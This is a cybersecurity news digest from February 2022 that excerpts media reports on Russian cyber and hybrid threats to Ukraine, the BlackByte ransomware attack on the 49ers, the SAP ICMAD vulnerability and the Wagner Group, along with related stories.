Sunday, February 13, 2022 // (IG): BB //Weekly Sponsor: BLKTRIANGLE
Russians Have Already Started Hybrid War With Bomb Threats, Cyberattacks, Ukraine Says
FROM THE MEDIA: Ukraine—U.S. officials are warning that Russia could be about to attack Ukraine. For many citizens in this embattled country, the assault has already begun. Ukrainian officials say that Russia, which has positioned more than 100,000 troops around three sides of Ukraine, is stepping up a destabilization campaign involving cyberattacks, economic disruption and a new tactic: hundreds of fake bomb threats. Russian forces and their proxies already control portions of Ukraine and frequent skirmish with government forces. The aim of Moscow’s intensifying hybrid campaign, Ukrainian officials say, is to weaken their country and sow panic, potentially provoking discontent and protests of the kind Russia fomented in eastern Ukraine in 2014 to justify its interventions there. U.S. and U.K. officials said last month they uncovered coup plots intended to install a puppet pro-Russian government. The tactics illustrate how Russian President Vladimir Putin can maintain pressure on Ukraine without escalating to a shooting war that could provoke sanctions from the West. Ukrainian officials say a destabilization campaign is more likely than a large-scale invasion.
READ THE STORY: WSJ
A QUICK LOOK:
US cyber defense agency warns of possible Russian cyberattacks amid tensions
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) has issued a "Shields Up" alert for American organizations saying that U.S. systems could face Russian cyberattacks amid warnings from Biden administration officials that a Russian invasion of Ukraine could be imminent. With U.S. officials warning on Friday that Russia could invade Ukraine "any day now," CISA's alert recommended that all organizations in the U.S., regardless of size, "adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets." "While there are not currently any specific credible threats to the U.S. homeland, we are mindful of the potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine," CISA said. NBC News reported that the agency issued the alert Friday night. Russia has amassed more than 100,000 troops on the Ukrainian border, creating a tense standoff in the international community over an expected invasion. President Biden warned Russian leader Vladimir Putin on Saturday that Russia would face "swift and severe costs" if it chooses to invade Ukraine. White House national security advisers told reports a day earlier that "Russians are in a position to be able to mount a major military action in Ukraine any day" and that an invasion could begin before the end of the Winter Olympics on Feb. 20.
READ THE STORY: The Hill
A QUICK LOOK:
Ukraine shores up cyber defenses in readiness for Russian attack
FROM THE MEDIA: Viktor Zhora proudly showed off the new facilities at one of Ukraine’s cyber security agencies, where opposing teams stage mock battles to prepare for the real thing. The training is paying off, said Zhora, deputy chair of the State Service of Special Communications and Information Protection, the country’s security and intelligence service. An attack last month that targeted government websites was quickly contained by his staff with the help of IT companies including Microsoft, he said. “We need to align our activities with risk and threats that have been increasing in past years . . . We should always be ready for the worst.” Zhora said. Ukraine said “all evidence” pointed to Russian responsibility, with officials and analysts saying this was just the tip of the iceberg. The country has been under constant attack from Russian and Kremlin-backed hackers since Moscow’s 2014 annexation of Crimea. Cyber espionage, damage to databases and servers, disruption to power and communications and disinformation are all part of the playbook. With Russia massing more than 100,000 troops on the Ukraine border and western powers accusing Moscow of planning a full-blown invasion, the Kyiv government and independent experts expect hostile cyber activity to increase in an effort to destabilise the country before or during any attack.
READ THE STORY: Financial Times
A QUICK LOOK:
Planning for a Nation-State Cyber Attack — Are You Ready?
FROM THE MEDIA: Some global experts are predicting a significant cyber attack against U.S. and UK critical infrastructure if Russia invades Ukraine. Whether it happens or not, is your organization prepared for this scenario? Warnings are pouring in from all over the world about the U.S. and U.K. domestic impacts resulting from a potential attack on Ukraine from Russia. Assuming the U.S. imposes sanctions or takes other retaliatory measures against Russia should an invasion occur, experts say that cyber attacks could be launched against U.S. and U.K. businesses and even government agencies. Regardless of whether you believe Russia will attack Ukraine over the next few months, it is important for all enterprises to prepare for this scenario. Other related cyber attack scenarios include a Chinese invasion of Taiwan.
Scenario planning for cyber attacks is the norm for smart public- and private-sector enterprises, and this type of situation is often viewed as a worst-case scenario by some, thus the reluctance to discuss it openly in the media. Nevertheless, in my opinion, it is an important topic for state and local governments to consider given the current situation with Russia and Ukraine. This article from James Lewis at the Center for Strategic and International Studies (CSIS) earlier this month provides some good background and context on “Russia and the Threat of Massive Cyberattack.”
In addition, the Cybersecurity and Infrastructure Security Agency (CISA) released this important alert in January, and I published this blog on the topic last month, saying to pay attention.
READ THE STORY: Govtech
A QUICK LOOK:
Facebook exposes ‘god mode’ token that could siphon data
FROM THE MEDIA: Ban of Chrome extension by Brave reveals risk of potential API abuse at Meta. Brave this week said it is blocking the installation of a popular Chrome extension called L.O.C. because it exposes users’ Facebook data to potential theft. “If a user is already logged into Facebook, installing this extension will automatically grant a third-party server access to some of the user’s Facebook data,” explained Francois Marier, a security engineer at Brave, in a GitHub Issues post. “The API used by the extension does not cause Facebook to show a permission prompt to the user before the application’s access token is issued.” However, the developer of the extension, Loc Mai, told The Register that his extension is not harvesting information – as the extension’s privacy policy states. The extension currently has around 700,000 users. “The extension does not collect the user’s data unless the user becomes a Premium user, and the only thing it collects is UID – which is unique to each person,” explained Mai. Mai said the extension stores the token locally, under localStorage.touch
. That presents a security risk but isn’t indicative of wrongdoing. L.O.C. continues to be available through the Chrome Web Store.
READ THE STORY: Cyber Reports
A QUICK LOOK:
San Francisco 49ers NFL team discloses BlackByte ransomware attack
FROM THE MEDIA: The team told The Record that it immediately launched an investigation into the attack and took steps to contain the incident with the help of third-party cybersecurity firms, it also notified law enforcement. The company added that it has no indication that the security breach involved systems outside of its corporate network, such as those connected ticket holders. The Record pointed out that the consequence of the ransomware attack could have been catastrophic if the team had qualified for Super Bowl LVI due to the impact on the team’s game preparations. The BlackByte ransomware operation has been active since September 2021, in October 2021 researchers from Trustwave’s SpiderLabs released a decryptor that can allow victims of the BlackByte ransomware to restore their files for free. The experts spotted the BlackByte ransomware while investigating a recent malware incident. The analysis of the ransomware revealed that it was developed to avoid infecting systems that primarily use Russian or related languages. Unlike other ransomware that may have a unique key in each session, that version of BlackByte was using the same raw key to encrypt files and it uses the symmetric-key algorithm AES. Anyone that could access the raw key would be able to decrypt the files. Trustwave researchers found the way to exploit poot coding to create the decrypter.
READ THE STORY: Security Affairs
A QUICK LOOK:
Analyzing Phishing attacks that use malicious PDFs
FROM THE MEDIA: A step by step walk through of looking a malicious PDFs. Every day everybody receives many phishing attacks with malicious docs or PDFs. I decided to take a look at one of these files. I did a static analysis and I went straight to the point to make this reading simple and fast. Here is the received email as it was from the Caixa Economica Federal bank, but we can see the sender uses Gmail services and a strange name.
READ THE STORY: Security Affairs
A QUICK LOOK:
The China tech theft threat
FROM THE MEDIA: The fact that China commits cooperate espionage isn’t breaking news. But, if you are reading this article, odds are China has already stolen your personal data. In 2017, Chinese military-backed hackers infiltrated the computer systems of the credit report agency Equifax, making off with the personal information of over 150 million people. Another Chinese group successfully hacked the federal Office of Personnel Management three years earlier. And while four Chinese citizens were eventually indicted on charges including the Equifax theft, China and its cybercrime network has never stopped stealing from U.S. firms. On a daily basis, they target healthcare providers, utilities, universities, software companies, manufacturers… Anyone who has anything of value online is a target for Chinese theft, and it is a multilayered policy of China to steal every bit of tech and data they can get their hands on. These hacks are not random crimes. They are just one part of a much larger plan for technological dominance. China’s 14th five-year plan includes a "Made in China 2025" project that identifies a dozen technologies China wants to be the world leader in, including artificial intelligence, biotechnology, semiconductors, quantum information systems, and drones.
READ THE STORY: Washington Examiner
A QUICK LOOK:
Major SAP vulnerability requires urgent patch to prevent HTTP request smuggling attacks
FROM THE MEDIA: Security researchers, enterprise software maker SAP, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued warnings over a critical vulnerability affecting Internet Communication Manager (ICM), a core component of SAP business applications that enables HTTPS communications. Tracked as CVE-2022-22536, the vulnerability allows attackers to use malformed packets to trick SAP servers into exposing sensitive data without needing to authenticate, according to Onapsis Research Labs. A security patch is available and organisations are urged to update as soon as possible. Exploitation possible via simple HTTP request. In a report, Onapsis stated that the vulnerability can be exploited via an attack known as HTTP request smuggling, which can be used to steal credentials and session information from unpatched SAP servers even if servers are placed behind proxies. “A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,” it added. A post on SAP’s website confirmed the severity of the issue, which was announced at the same time as two other, less serious SAP vulnerabilities tracked as CVE-2022-22532 and CVE-2022-22533. “If your organisation’s program was exploited, these vulnerabilities, a.k.a. “ICMAD,” will enable attackers to execute serious malicious activity on SAP users, business information, and processes,” SAP said.
READ THE STORY: Reseller
A QUICK LOOK:
There's a social media link to human trafficking, claims Jamaica Constabulary Force (JCF)
FROM THE MEDIA: The Jamaica Constabulary Force (JCF) says because of improper and unmonitored Internet use among children, it has noticed a link between social media and human trafficking. At the same time, the force says it also suspects that recent missing people cases stem from connections made with perpetrators on social media sites. “On trends, I believe that there is a close relationship between social media and, of course, missing persons. We see a lot of youngsters... they meet anonymous persons online, not knowing who they are communicating with. We have had cases where young persons, schoolchildren have lost their lives, some are missing and have not returned, but we're still happy that we do have some level of skillset to assist in locating persons who become missing,” Deputy Superintendent Warren Williams, head of the Communications, Forensic and Cybercrimes Division at the JCF, told the Jamaica Observer in an interview. “The more persons are online, the more they meet persons online, they share a lot of personal information. Not only in meeting, but, of course, the Instagram, all of these popular social media.” Williams, who was addressing Jamaica Observer reporters during Flow's Safer Internet think tank, last Thursday, said the division is also aware of an association fostering human trafficking of youngsters in Jamaica. “A lot of persons talk about fishing and sexual grooming. Youngsters get online and they are engaged in arguments and directions that are not appropriate. They [traffickers] get these youngsters to showcase their body parts and all kinds of things. Sometimes they are trafficked, or their body parts are trafficked to all kinds of employment outside of Jamaica, which is not fit for their age group. We are seeing cases like these and it's quite a concern,” he told the Sunday Observer.
READ THE STORY: Jamaica Observer
A QUICK LOOK:
Items of interest
Band of Brothers: The Wagner Group and the Russian State(Article)
FROM THE MEDIA: This article is part of the CSIS executive education program Understanding the Russian Military Today. The Russian private military company Wagner Group may appear to be a conventional business company. However, its management and operations are deeply intertwined with the Russian military and intelligence community. The Russian government has found Wagner and other private military companies to be useful as a way to extend its influence overseas without the visibility and intrusiveness of state military forces. As a result, Wagner should be considered a proxy organization of the Russian state rather than a private company selling services on the open market. The post-Cold War era brought a renaissance of private security companies (PSCs) and private military companies (PMCs). Both state and non-state actors have frequently relied on their services, as these companies are more flexible, cheaper, less accountable, and often a lot more capable than regular militaries. Conflicts of the 21st century, particularly the wars in Afghanistan and Iraq, saw PMCs getting involved on all levels, from providing logistical support to high-intensity operations.
READ THE STORY: CSIS
Russia’s Wagner Group Moved To Ukraine l How Putin Uses The Mercenaries To Fulfil His Objectives(Video)
FROM THE MEDIA: Tensions in Ukraine are expected to escalate further due to the reported involvement of Russia’s infamous Wagner Group. According to reports, an unprecedented numbers of Wagner mercenaries left Africa for Eastern Europe in January. The exodus of Wagner mercenaries has come at a time when war is looming large over Ukraine. More Russian mercenaries are expected to leave Africa and the news has left Europe worried. Kyiv’s military intelligence recently alleged that Russia is actively recruiting mercenaries to fight in the ongoing conflict.
The Wagner Group: Untangling the Purpose behind a Russian Power Tool(Video)
FROM THE MEDIA: The Wagner Group (Russian: Группа Вагнера, romanized: Gruppa Vagnera), also known as PMC Wagner, ChVK Wagner (ChVK being the Russian abbreviation for Private Military Company[33]), or CHVK Vagner (ЧВК Вагнера ChVK Vagnera, Частная Военная Компания Вагнера), is a Russian paramilitary organization. Some have described it as a private military company (or private military contracting agency), whose contractors have reportedly taken part in various conflicts, including operations in the Syrian civil war on the side of the Syrian government as well as, from 2014 until 2015, in the war in Donbas in Ukraine aiding the separatist forces of the self-declared Donetsk and Luhansk people's republics.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com